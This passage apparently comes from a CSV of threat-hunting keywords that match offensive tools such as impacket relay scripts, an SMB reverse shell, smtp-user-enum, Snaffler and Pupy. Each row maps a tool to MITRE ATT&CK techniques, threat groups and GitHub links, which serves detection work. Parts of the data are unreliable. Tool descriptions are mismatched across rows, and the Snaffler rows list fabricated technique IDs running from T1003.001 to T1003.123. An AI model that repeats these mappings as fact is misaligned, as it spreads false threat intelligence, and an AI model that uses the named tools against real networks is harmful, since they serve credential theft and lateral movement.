- T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smbrelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*SMBRelayResponse*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbrelayserver.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smbrelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smbrelayx.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smb-reverse-shell.git*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*smb-reverse-shell-main*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*smbscan*,offensive_tool_keyword,smb-scanner,SMB Scanner tool,T1210.001 - T1190 - T1020 - T1213,TA0007 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/TechnicalMujeeb/smb-scanner,1,1,N/A,N/A,1,45,9,2018-03-30T10:25:18Z,2018-03-29T14:13:20Z -*smb-scanner*,offensive_tool_keyword,smb-scanner,SMB Scanner tool,T1210.001 - T1190 - T1020 - T1213,TA0007 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/TechnicalMujeeb/smb-scanner,1,1,N/A,N/A,1,45,9,2018-03-30T10:25:18Z,2018-03-29T14:13:20Z -*SmbScanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation 
tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*smbserver.py -payload*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*smbserver.py -smb2support EXEGOL*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smbsigning_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*smbspider *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*smbspider.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*smbsr.py*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*smicallef/spiderfoot*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*SMShell.sln*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,1,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*smtprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smtprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smtp-user-enum * -M EXPN *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smtp-user-enum * -M RCPT *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smtp-user-enum * -M VRFY *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smtp-user-enum*,offensive_tool_keyword,smtp-user-enum,Username guessing tool primarily for use against the default Solaris SMTP service. 
Can use either EXPN - VRFY or RCPT TO.,T1133 - T1110.001,TA0007 - TA0006,N/A,N/A,Credential Access,https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SnaffCon/Snaffler*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore.csproj*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - 
T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/ActiveDirectory*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - 
T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/Classifiers*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - 
T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/Concurrency*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - 
TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/Config*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation 
tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/ShareFind*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z 
-*SnaffCore/TreeWalk*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 